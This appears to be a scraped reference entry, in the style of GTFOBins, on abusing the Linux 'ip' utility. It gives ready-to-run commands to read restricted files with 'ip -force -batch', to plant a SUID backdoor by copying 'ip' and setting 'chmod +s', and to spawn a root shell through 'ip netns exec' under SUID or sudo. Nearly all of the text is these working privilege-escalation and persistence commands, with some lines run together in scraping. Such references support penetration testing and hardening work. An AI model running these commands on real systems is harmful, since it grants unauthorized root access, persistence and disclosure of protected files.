The read file content is corrupted by error prints.
It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
LFILE=file_to_read
ip -force -batch "$LFILE"It runs with the SUID bit set and may be exploited to access the file
system, escalate or maintain access with elevated privileges working as a
SUID backdoor. If it is used to run sh -p, omit the -p argument on systems
like Debian that allow the default sh shell to run with SUID privileges.
sudo sh -c 'cp $(which ip) .; chmod +s ./ip'
LFILE=file_to_read
./ip -force -batch "$LFILE"This only works for Linux with CONFIG_NET_NS=y.
sudo sh -c 'cp $(which ip) .; chmod +s ./ip'
./ip netns add foo
./ip netns exec foo /bin/sh -p
./ip netns delete fooIt runs in privileged context and may be used to access the file system,
escalate or maintain access with elevated privileges if enabled on sudo.
LFILE=file_to_read
sudo ip -force -batch "$LFILE"This only works for Linux with CONFIG_NET_NS=y.
sudo ip netns add foo
sudo ip netns exec foo /bin/sh
sudo ip netns delete foo